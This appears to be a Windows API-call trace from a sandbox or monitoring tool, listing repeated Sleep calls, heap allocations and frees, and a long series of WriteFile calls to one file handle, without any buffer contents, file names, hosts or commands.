	[0204.894] Sleep (dwMilliseconds=0x1) 
	[0204.912] Sleep (dwMilliseconds=0x1) 
	[0204.925] Sleep (dwMilliseconds=0x1) 
	[0204.943] Sleep (dwMilliseconds=0x1) 
	[0204.959] Sleep (dwMilliseconds=0x1) 
	[0204.975] Sleep (dwMilliseconds=0x1) 
	[0204.992] Sleep (dwMilliseconds=0x1) 
	[0205.037] Sleep (dwMilliseconds=0x1) 
	[0205.081] Sleep (dwMilliseconds=0x1) 
	[0205.128] Sleep (dwMilliseconds=0x1) 
	[0205.151] Sleep (dwMilliseconds=0x1) 
	[0205.159] Sleep (dwMilliseconds=0x1) 
	[0205.176] Sleep (dwMilliseconds=0x1) 
	[0205.193] Sleep (dwMilliseconds=0x1) 
	[0205.209] Sleep (dwMilliseconds=0x1) 
	[0205.224] Sleep (dwMilliseconds=0x1) 
	[0205.250] Sleep (dwMilliseconds=0x1) 
	[0205.299] Sleep (dwMilliseconds=0x1) 
	[0205.346] Sleep (dwMilliseconds=0x1) 
	[0205.362] Sleep (dwMilliseconds=0x1) 
	[0205.379] Sleep (dwMilliseconds=0x1) 
	[0205.395] Sleep (dwMilliseconds=0x1) 
	[0205.411] Sleep (dwMilliseconds=0x1) 
	[0205.427] Sleep (dwMilliseconds=0x1) 
	[0205.443] Sleep (dwMilliseconds=0x1) 
	[0205.502] Sleep (dwMilliseconds=0x1) 
	[0205.549] Sleep (dwMilliseconds=0x1) 
	[0205.572] Sleep (dwMilliseconds=0x1) 
	[0205.580] Sleep (dwMilliseconds=0x1) 
	[0205.596] Sleep (dwMilliseconds=0x1) 
	[0205.628] Sleep (dwMilliseconds=0x1) 
	[0205.645] Sleep (dwMilliseconds=0x1) 
	[0205.661] Sleep (dwMilliseconds=0x1) 
	[0205.720] Sleep (dwMilliseconds=0x1) 
	[0205.767] Sleep (dwMilliseconds=0x1) 
	[0205.786] Sleep (dwMilliseconds=0x1) 
	[0205.799] Sleep (dwMilliseconds=0x1) 
	[0205.815] Sleep (dwMilliseconds=0x1) 
	[0205.832] Sleep (dwMilliseconds=0x1) 
	[0205.848] Sleep (dwMilliseconds=0x1) 
	[0205.864] Sleep (dwMilliseconds=0x1) 
	[0205.880] Sleep (dwMilliseconds=0x1) 
	[0205.939] Sleep (dwMilliseconds=0x1) 
	[0205.986] Sleep (dwMilliseconds=0x1) 
	[0206.007] Sleep (dwMilliseconds=0x1) 
	[0206.057] Sleep (dwMilliseconds=0x1) 
	[0206.064] Sleep (dwMilliseconds=0x1) 
	[0206.079] Sleep (dwMilliseconds=0x1) 
	[0206.098] Sleep (dwMilliseconds=0x1) 
	[0206.158] Sleep (dwMilliseconds=0x1) 
	[0206.204] Sleep (dwMilliseconds=0x1) 
	[0206.225] Sleep (dwMilliseconds=0x1) 
	[0206.235] Sleep (dwMilliseconds=0x1) 
	[0206.252] Sleep (dwMilliseconds=0x1) 
	[0206.268] Sleep (dwMilliseconds=0x1) 
	[0206.282] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x50) returned 0x22aa330
	[0206.282] WriteFile (in: hFile=0x534, lpBuffer=0x26d1134*, nNumberOfBytesToWrite=0x75, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d1134*, lpNumberOfBytesWritten=0x129420*=0x75, lpOverlapped=0x0) returned 1
	[0206.282] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.283] WriteFile (in: hFile=0x534, lpBuffer=0x26d11ab*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d11ab*, lpNumberOfBytesWritten=0x129420*=0x16, lpOverlapped=0x0) returned 1
	[0206.283] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.283] WriteFile (in: hFile=0x534, lpBuffer=0x26d11c3*, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d11c3*, lpNumberOfBytesWritten=0x129420*=0x2c, lpOverlapped=0x0) returned 1
	[0206.283] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.283] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x26cb888
	[0206.283] WriteFile (in: hFile=0x534, lpBuffer=0x26d11f1*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d11f1*, lpNumberOfBytesWritten=0x129420*=0x26, lpOverlapped=0x0) returned 1
	[0206.283] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.284] WriteFile (in: hFile=0x534, lpBuffer=0x26d1219*, nNumberOfBytesToWrite=0x13, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d1219*, lpNumberOfBytesWritten=0x129420*=0x13, lpOverlapped=0x0) returned 1
	[0206.284] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.284] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xb0) returned 0x227b770
	[0206.284] WriteFile (in: hFile=0x534, lpBuffer=0x26d122e*, nNumberOfBytesToWrite=0xa9, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d122e*, lpNumberOfBytesWritten=0x129420*=0xa9, lpOverlapped=0x0) returned 1
	[0206.284] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.284] WriteFile (in: hFile=0x534, lpBuffer=0x26d12d9*, nNumberOfBytesToWrite=0x51, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d12d9*, lpNumberOfBytesWritten=0x129420*=0x51, lpOverlapped=0x0) returned 1
	[0206.284] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.284] WriteFile (in: hFile=0x534, lpBuffer=0x26d132c*, nNumberOfBytesToWrite=0x33, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d132c*, lpNumberOfBytesWritten=0x129420*=0x33, lpOverlapped=0x0) returned 1
	[0206.285] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.285] WriteFile (in: hFile=0x534, lpBuffer=0x26d1361*, nNumberOfBytesToWrite=0x46, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d1361*, lpNumberOfBytesWritten=0x129420*=0x46, lpOverlapped=0x0) returned 1
	[0206.285] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.285] WriteFile (in: hFile=0x534, lpBuffer=0x26d13a9*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d13a9*, lpNumberOfBytesWritten=0x129420*=0x43, lpOverlapped=0x0) returned 1
	[0206.285] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.285] WriteFile (in: hFile=0x534, lpBuffer=0x26d13ee*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d13ee*, lpNumberOfBytesWritten=0x129420*=0xa, lpOverlapped=0x0) returned 1
	[0206.285] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.285] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xa60) returned 0x272c4c8
	[0206.286] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x6f0) returned 0x22ba9c8
	[0206.286] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x14d0) returned 0x26d33a0
	[0206.286] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x950) returned 0x26ccc38
	[0206.290] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26ccc38) returned 1
	[0206.290] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xb30) returned 0x26ccc38
	[0206.290] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ba9c8) returned 1
	[0206.290] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26d33a0) returned 1
	[0206.290] WriteFile (in: hFile=0x534, lpBuffer=0x26ccc38*, nNumberOfBytesToWrite=0xb2c, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26ccc38*, lpNumberOfBytesWritten=0x129420*=0xb2c, lpOverlapped=0x0) returned 1
	[0206.290] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.291] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26ccc38) returned 1
	[0206.291] WriteFile (in: hFile=0x534, lpBuffer=0x26d1e68*, nNumberOfBytesToWrite=0x38, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d1e68*, lpNumberOfBytesWritten=0x129420*=0x38, lpOverlapped=0x0) returned 1
	[0206.291] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.291] WriteFile (in: hFile=0x534, lpBuffer=0x26d1ea2*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d1ea2*, lpNumberOfBytesWritten=0x129420*=0x12, lpOverlapped=0x0) returned 1
	[0206.291] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.291] WriteFile (in: hFile=0x534, lpBuffer=0x26d1eb6*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d1eb6*, lpNumberOfBytesWritten=0x129420*=0x14, lpOverlapped=0x0) returned 1
	[0206.291] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.291] WriteFile (in: hFile=0x534, lpBuffer=0x26d1ecc*, nNumberOfBytesToWrite=0x4b, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d1ecc*, lpNumberOfBytesWritten=0x129420*=0x4b, lpOverlapped=0x0) returned 1
	[0206.291] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.292] WriteFile (in: hFile=0x534, lpBuffer=0x26d1f19*, nNumberOfBytesToWrite=0x25, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d1f19*, lpNumberOfBytesWritten=0x129420*=0x25, lpOverlapped=0x0) returned 1
	[0206.292] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.292] WriteFile (in: hFile=0x534, lpBuffer=0x26d1f40*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d1f40*, lpNumberOfBytesWritten=0x129420*=0x28, lpOverlapped=0x0) returned 1
	[0206.292] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.292] WriteFile (in: hFile=0x534, lpBuffer=0x26d1f6a*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d1f6a*, lpNumberOfBytesWritten=0x129420*=0x41, lpOverlapped=0x0) returned 1
	[0206.292] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.292] WriteFile (in: hFile=0x534, lpBuffer=0x26d1fad*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d1fad*, lpNumberOfBytesWritten=0x129420*=0x44, lpOverlapped=0x0) returned 1
	[0206.293] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.293] WriteFile (in: hFile=0x534, lpBuffer=0x26d1ff3*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d1ff3*, lpNumberOfBytesWritten=0x129420*=0x12, lpOverlapped=0x0) returned 1
	[0206.293] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.293] WriteFile (in: hFile=0x534, lpBuffer=0x26d2007*, nNumberOfBytesToWrite=0x12, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2007*, lpNumberOfBytesWritten=0x129420*=0x12, lpOverlapped=0x0) returned 1
	[0206.293] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.293] WriteFile (in: hFile=0x534, lpBuffer=0x26d201b*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d201b*, lpNumberOfBytesWritten=0x129420*=0xf, lpOverlapped=0x0) returned 1
	[0206.293] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.293] WriteFile (in: hFile=0x534, lpBuffer=0x26d202c*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d202c*, lpNumberOfBytesWritten=0x129420*=0x2a, lpOverlapped=0x0) returned 1
	[0206.293] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.293] WriteFile (in: hFile=0x534, lpBuffer=0x26d2058*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2058*, lpNumberOfBytesWritten=0x129420*=0x3f, lpOverlapped=0x0) returned 1
	[0206.294] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.294] WriteFile (in: hFile=0x534, lpBuffer=0x26d2099*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2099*, lpNumberOfBytesWritten=0x129420*=0x4c, lpOverlapped=0x0) returned 1
	[0206.294] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.294] WriteFile (in: hFile=0x534, lpBuffer=0x26d20e7*, nNumberOfBytesToWrite=0x27, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d20e7*, lpNumberOfBytesWritten=0x129420*=0x27, lpOverlapped=0x0) returned 1
	[0206.294] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.294] WriteFile (in: hFile=0x534, lpBuffer=0x26d2110*, nNumberOfBytesToWrite=0x44, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2110*, lpNumberOfBytesWritten=0x129420*=0x44, lpOverlapped=0x0) returned 1
	[0206.294] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.294] WriteFile (in: hFile=0x534, lpBuffer=0x26d2156*, nNumberOfBytesToWrite=0x4c, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2156*, lpNumberOfBytesWritten=0x129420*=0x4c, lpOverlapped=0x0) returned 1
	[0206.294] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.294] WriteFile (in: hFile=0x534, lpBuffer=0x26d21a4*, nNumberOfBytesToWrite=0x11, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d21a4*, lpNumberOfBytesWritten=0x129420*=0x11, lpOverlapped=0x0) returned 1
	[0206.294] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.294] WriteFile (in: hFile=0x534, lpBuffer=0x26d21b7*, nNumberOfBytesToWrite=0x53, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d21b7*, lpNumberOfBytesWritten=0x129420*=0x53, lpOverlapped=0x0) returned 1
	[0206.294] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.295] WriteFile (in: hFile=0x534, lpBuffer=0x26d220c*, nNumberOfBytesToWrite=0x21, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d220c*, lpNumberOfBytesWritten=0x129420*=0x21, lpOverlapped=0x0) returned 1
	[0206.295] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.295] WriteFile (in: hFile=0x534, lpBuffer=0x26d222f*, nNumberOfBytesToWrite=0x3f, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d222f*, lpNumberOfBytesWritten=0x129420*=0x3f, lpOverlapped=0x0) returned 1
	[0206.295] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.295] WriteFile (in: hFile=0x534, lpBuffer=0x26d2270*, nNumberOfBytesToWrite=0x22, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2270*, lpNumberOfBytesWritten=0x129420*=0x22, lpOverlapped=0x0) returned 1
	[0206.295] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.295] WriteFile (in: hFile=0x534, lpBuffer=0x26d2294*, nNumberOfBytesToWrite=0x23, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2294*, lpNumberOfBytesWritten=0x129420*=0x23, lpOverlapped=0x0) returned 1
	[0206.295] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.295] WriteFile (in: hFile=0x534, lpBuffer=0x26d22b9*, nNumberOfBytesToWrite=0x15, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d22b9*, lpNumberOfBytesWritten=0x129420*=0x15, lpOverlapped=0x0) returned 1
	[0206.296] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.296] WriteFile (in: hFile=0x534, lpBuffer=0x26d22d0*, nNumberOfBytesToWrite=0x55, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d22d0*, lpNumberOfBytesWritten=0x129420*=0x55, lpOverlapped=0x0) returned 1
	[0206.296] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.296] WriteFile (in: hFile=0x534, lpBuffer=0x26d2327*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2327*, lpNumberOfBytesWritten=0x129420*=0x20, lpOverlapped=0x0) returned 1
	[0206.296] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.296] WriteFile (in: hFile=0x534, lpBuffer=0x26d2349*, nNumberOfBytesToWrite=0x35, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2349*, lpNumberOfBytesWritten=0x129420*=0x35, lpOverlapped=0x0) returned 1
	[0206.296] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.296] WriteFile (in: hFile=0x534, lpBuffer=0x26d2380*, nNumberOfBytesToWrite=0x19, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2380*, lpNumberOfBytesWritten=0x129420*=0x19, lpOverlapped=0x0) returned 1
	[0206.296] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.296] WriteFile (in: hFile=0x534, lpBuffer=0x26d239b*, nNumberOfBytesToWrite=0x3a, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d239b*, lpNumberOfBytesWritten=0x129420*=0x3a, lpOverlapped=0x0) returned 1
	[0206.296] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.296] WriteFile (in: hFile=0x534, lpBuffer=0x26d23d7*, nNumberOfBytesToWrite=0x19, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d23d7*, lpNumberOfBytesWritten=0x129420*=0x19, lpOverlapped=0x0) returned 1
	[0206.296] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.296] WriteFile (in: hFile=0x534, lpBuffer=0x26d23f2*, nNumberOfBytesToWrite=0x14, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d23f2*, lpNumberOfBytesWritten=0x129420*=0x14, lpOverlapped=0x0) returned 1
	[0206.296] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
	[0206.296] WriteFile (in: hFile=0x534, lpBuffer=0x26d2408*, nNumberOfBytesToWrite=0x23, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x26d2408*, lpNumberOfBytesWritten=0x129420*=0x23, lpOverlapped=0x0) returned 1
	[0206.297] WriteFile (in: hFile=0x534, lpBuffer=0x129410*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x129420, lpOverlapped=0x0 | out: lpBuffer=0x129410*, lpNumberOfBytesWritten=0x129420*=0x2, lpOverlapped=0x0) returned 1
